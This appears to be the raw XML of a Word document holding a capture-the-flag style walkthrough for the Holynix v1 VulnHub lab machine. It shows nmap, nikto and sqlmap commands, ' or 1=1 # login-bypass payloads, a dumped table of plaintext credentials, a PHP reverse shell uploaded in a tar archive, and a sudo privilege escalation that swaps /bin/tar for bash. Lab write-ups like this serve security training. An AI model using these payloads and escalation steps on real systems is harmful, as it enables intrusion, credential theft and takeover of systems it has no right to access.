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53" w:rsidRDefault="00885C53">
      <w:r>
        <w:t xml:space="preserve">VM: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00183522" w:rsidRPr="00B77C73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/holynix-v1,20/#download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00105184" w:rsidRDefault="00AB0681">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E8FAD99" wp14:editId="6760C67E">
            <wp:extent cx="5943600" cy="159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3A" w:rsidRDefault="0040273A" w:rsidP="0040273A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AB0681" w:rsidRDefault="0040273A" w:rsidP="0040273A">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.151</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040273A" w:rsidRDefault="00AE794F" w:rsidP="0040273A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC1F882" wp14:editId="05BBD388">
            <wp:extent cx="5943600" cy="133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4F" w:rsidRDefault="005F47C3" w:rsidP="0040273A">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00064BC4" w:rsidRPr="003F76DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.151/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00064BC4" w:rsidRDefault="003A0F36" w:rsidP="0040273A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9ED51D" wp14:editId="5DF90B7F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4F" w:rsidRDefault="00A2474F" w:rsidP="00A2474F">
      <w:r>
        <w:t>This appears to be a basic SQL query. We should now be able to execute the command to bypass the login using the or 1=1 technique</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2474F" w:rsidRDefault="00A2474F" w:rsidP="00A2474F"/>
    <w:p w:rsidR="00A2474F" w:rsidRDefault="00A2474F" w:rsidP="00A2474F">
      <w:r>
        <w:t>Username = ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A0F36" w:rsidRDefault="00A2474F" w:rsidP="00A2474F">
      <w:r>
        <w:t>Password = ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC2B1A" w:rsidRDefault="00AC2B1A" w:rsidP="00AC2B1A">
      <w:r>
        <w:t xml:space="preserve">Once logged in, we noticed that actually we are inside the user Alamo’s login page. After having a look at different pages, we navigated to the Upload page and tried to upload the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC2B1A" w:rsidRDefault="00AC2B1A" w:rsidP="00AC2B1A"/>
    <w:p w:rsidR="00AC2B1A" w:rsidRDefault="00AC2B1A" w:rsidP="00AC2B1A"/>
    <w:p w:rsidR="00A2474F" w:rsidRDefault="00AC2B1A" w:rsidP="00AC2B1A">
      <w:r>
        <w:t xml:space="preserve">Upon trying to upload the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, we got the below notification .It seems the user Alamo, being a restricted user; doesn’t have permission to upload the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B5C" w:rsidRDefault="00850B5C" w:rsidP="00850B5C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AC2B1A" w:rsidRDefault="00850B5C" w:rsidP="00850B5C">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="003F76DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.151</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00850B5C" w:rsidRDefault="001F3B53" w:rsidP="00850B5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E02E601" wp14:editId="63A2944C">
            <wp:extent cx="594360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53" w:rsidRDefault="005F47C3" w:rsidP="00850B5C">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00E327F1" w:rsidRPr="003F76DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.151/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E327F1" w:rsidRDefault="00537CAC" w:rsidP="00850B5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C39D976" wp14:editId="66D31833">
            <wp:extent cx="5943600" cy="166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ED" w:rsidRDefault="00267BED" w:rsidP="00850B5C">
      <w:r>
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267BED" w:rsidRDefault="00267BED" w:rsidP="00850B5C">
      <w:r>
        <w:t>Password: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537CAC" w:rsidRDefault="00722DEB" w:rsidP="00850B5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B267C8" wp14:editId="5ADFDECC">
            <wp:extent cx="5943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52" w:rsidRDefault="00671752" w:rsidP="00671752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722DEB" w:rsidRDefault="00671752" w:rsidP="00671752">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u http://192.168.21.151/index.php?page=login.php --forms --data="username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ltorvalds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00671752" w:rsidRDefault="008659E8" w:rsidP="00671752">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25340D05" wp14:editId="4EDD8D67">
            <wp:extent cx="20478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4A" w:rsidRDefault="00123D4A" w:rsidP="00123D4A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8659E8" w:rsidRDefault="00123D4A" w:rsidP="00123D4A">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u http://192.168.21.151/index.php?page=login.php --forms --data="username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ltorvalds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" -D creds --tables --dump –batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00123D4A" w:rsidRDefault="00840B13" w:rsidP="00123D4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552CC45D" wp14:editId="06BCA7F8">
            <wp:extent cx="450532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3" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t>+-----+--------+--------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | upload | password           | username   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t>+-----+--------+--------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 1   | 0      | Ih@cK3dM1cR05oF7   | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alamo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 2   | 1      | P3n7@g0n0wN3d      | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etenenbaum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 3   | 1      | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>d15cL0suR3Pr0J3c7  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmckinnon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 4   | 1      | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ik1Ll3dNiN@r315er  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hreiser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 5   | 1      | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p1@yIngW17hPh0n35  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jdraper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 6   | 1      | @rR35t3D@716       | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jjames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 7   | 1      | m@k1nGb0o7L3g5     | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jljohansen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 8   | 1      | wH@7ar37H3Fed5D01n | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kpoulsen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| 9   | 0      | f@7H3r0FL1nUX      | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ltorvalds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>10  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1      | n@5aHaSw0rM5       | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mrbutler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>11  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1      | Myd@d51N7h3NSA     | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtmorris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840B13" w:rsidRDefault="00E52063" w:rsidP="00E52063">
      <w:r>
        <w:t>+-----+--------+--------------------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52063" w:rsidRDefault="00E52063" w:rsidP="00E52063"/>
    <w:p w:rsidR="004C32CD" w:rsidRDefault="007C09F3" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4982D3FE" wp14:editId="1BFBC2E7">
            <wp:extent cx="594360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F3" w:rsidRDefault="00CC77A4" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A1B7419" wp14:editId="088F62C6">
            <wp:extent cx="5943600" cy="1843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9B" w:rsidRDefault="00AC239B" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753CDCCD" wp14:editId="3AEF9D1C">
            <wp:extent cx="31908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A2" w:rsidRDefault="00CA06A2" w:rsidP="00CA06A2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CA06A2" w:rsidRDefault="00AC239B" w:rsidP="00CA06A2">
      <w:r>
        <w:t>└─# tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zcvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test.tar.gz </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00CA06A2">
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA06A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC239B" w:rsidRDefault="00AC239B" w:rsidP="00AC239B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:noProof/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC239B" w:rsidRDefault="00AC239B" w:rsidP="00AC239B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>└─# tar -zcvf test.tar.gz test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA06A2" w:rsidRDefault="00AC239B" w:rsidP="00AC239B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476C83A5" wp14:editId="29033E30">
            <wp:extent cx="3181350" cy="58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14" w:rsidRDefault="00EE1114" w:rsidP="00E52063"/>
    <w:p w:rsidR="005F0BB2" w:rsidRDefault="00132354" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10B56BB8" wp14:editId="024A68E4">
            <wp:extent cx="5943600" cy="1907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DA" w:rsidRDefault="00B613DA" w:rsidP="00E52063"/>
    <w:p w:rsidR="00C35495" w:rsidRDefault="005F47C3" w:rsidP="00E52063">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="005A52AF" w:rsidRPr="003F76DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.151/~etenenbaum/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BB0702" w:rsidRDefault="00A5419F" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7194F637" wp14:editId="2DD68690">
            <wp:extent cx="5943600" cy="2749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9F" w:rsidRDefault="00F46AA6" w:rsidP="00E52063">
      <w:r>
        <w:t xml:space="preserve">Now click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and we get the shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F46AA6" w:rsidRDefault="000828B4" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50DD5ED5" wp14:editId="48C0218A">
            <wp:extent cx="5943600" cy="13887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37" w:rsidRDefault="00D30487" w:rsidP="00E52063">
      <w:r w:rsidRPr="00D30487">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D30487">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D30487">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30487">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30487" w:rsidRDefault="00395230" w:rsidP="00E52063">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5F9C36" wp14:editId="36419D3A">
            <wp:extent cx="4705350" cy="1181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46" w:rsidRDefault="009E1846" w:rsidP="009E1846">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w: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395230" w:rsidRDefault="009E1846" w:rsidP="009E1846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/bin/bash .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E1846" w:rsidRDefault="00350245" w:rsidP="009E1846">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D508EA5" wp14:editId="0F3E1EF4">
            <wp:extent cx="1704975" cy="381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45" w:rsidRDefault="00350245" w:rsidP="00350245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root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350245" w:rsidRDefault="00350245" w:rsidP="00350245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mv /bin/tar /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tar.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00350245" w:rsidRDefault="00350245" w:rsidP="00350245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mv /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bash /bin/tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350245" w:rsidRDefault="00350245" w:rsidP="00350245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/bin/tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350245" w:rsidRDefault="00350245" w:rsidP="00350245">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F94533" wp14:editId="13929EB4">
            <wp:extent cx="4191000" cy="1581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45" w:rsidRDefault="00350245" w:rsidP="00350245"/>
    <w:sectPr w:rsidR="0035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A8"/>
    <w:rsid w:val="00064BC4"/>
    <w:rsid w:val="000828B4"/>
    <w:rsid w:val="00105184"/>
    <w:rsid w:val="0011170F"/>
    <w:rsid w:val="00123D4A"/>
    <w:rsid w:val="00132354"/>
    <w:rsid w:val="00183290"/>
    <w:rsid w:val="00183522"/>
    <w:rsid w:val="001F3B53"/>
    <w:rsid w:val="00267BED"/>
    <w:rsid w:val="00350245"/>
    <w:rsid w:val="00395230"/>
    <w:rsid w:val="003A0F36"/>
    <w:rsid w:val="0040273A"/>
    <w:rsid w:val="004C32CD"/>
    <w:rsid w:val="004F1DEB"/>
    <w:rsid w:val="00537CAC"/>
    <w:rsid w:val="005A52AF"/>
    <w:rsid w:val="005F0BB2"/>
    <w:rsid w:val="005F47C3"/>
    <w:rsid w:val="00671752"/>
    <w:rsid w:val="00722DEB"/>
    <w:rsid w:val="00763C4A"/>
    <w:rsid w:val="007C09F3"/>
    <w:rsid w:val="00840B13"/>
    <w:rsid w:val="00850B5C"/>
    <w:rsid w:val="008659E8"/>
    <w:rsid w:val="00885C53"/>
    <w:rsid w:val="009A36A8"/>
    <w:rsid w:val="009E1846"/>
    <w:rsid w:val="00A2474F"/>
    <w:rsid w:val="00A5419F"/>
    <w:rsid w:val="00AB0681"/>
    <w:rsid w:val="00AC239B"/>
    <w:rsid w:val="00AC2B1A"/>
    <w:rsid w:val="00AE794F"/>
    <w:rsid w:val="00B613DA"/>
    <w:rsid w:val="00BB0702"/>
    <w:rsid w:val="00C35495"/>
    <w:rsid w:val="00CA06A2"/>
    <w:rsid w:val="00CB12CC"/>
    <w:rsid w:val="00CC77A4"/>
    <w:rsid w:val="00CF1654"/>
    <w:rsid w:val="00D30487"/>
    <w:rsid w:val="00DC5351"/>
    <w:rsid w:val="00E327F1"/>
    <w:rsid w:val="00E52063"/>
    <w:rsid w:val="00E77537"/>
    <w:rsid w:val="00EE1114"/>
    <w:rsid w:val="00F4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F778"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B4104A40-C7C0-4F51-B4E9-DF65A04D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://192.168.21.151/~etenenbaum/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.15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192.168.21.151/index.php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www.vulnhub.com/entry/holynix-v1,20/#download" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.15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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>90</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-06T11:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-07T17:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>